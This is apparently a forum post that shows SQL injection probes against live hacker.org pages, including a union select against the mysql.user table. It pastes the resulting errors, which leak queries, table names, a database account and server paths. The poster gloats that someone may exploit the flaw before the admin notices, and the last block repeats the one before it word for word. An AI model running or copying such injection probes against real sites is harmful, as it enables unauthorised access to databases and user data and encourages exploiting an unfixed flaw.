http://www.hacker.org/challenge/chal.php?id=39'
result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/challenge/chal.php on line 35
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND solved = 1' at line 1, qry: SELECT COUNT(*) FROM challengeresult WHERE chalid = 39' AND solved = 1
http://www.hacker.org/worm/?botid=41%20 ... mysql.user
result:
SELECT command denied to user 'hacker_phpbb'@'geyser.dreamhost.com' for table 'user', qry: SELECT arena FROM bots WHERE id = 41 union select 1 from mysql.user
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/worm/worm.php on line 33[/img]
little bug.......sql injection
http://www.hacker.org/util/charthistory ... &game=coil
result: No error.
http://www.hacker.org/util/charthistory ... &game=coil
result:
Unknown column 'user_name' in 'where clause', qry: SELECT username FROM phpbb_users WHERE user_id = 369 or user_name='123'
wa......hahah...............somebody may get an good idea before admin find this. I am waiting for something that would happen.....
result: No error.
http://www.hacker.org/util/charthistory ... &game=coil
result:
Unknown column 'user_name' in 'where clause', qry: SELECT username FROM phpbb_users WHERE user_id = 369 or user_name='123'
wa......hahah...............somebody may get an good idea before admin find this. I am waiting for something that would happen.....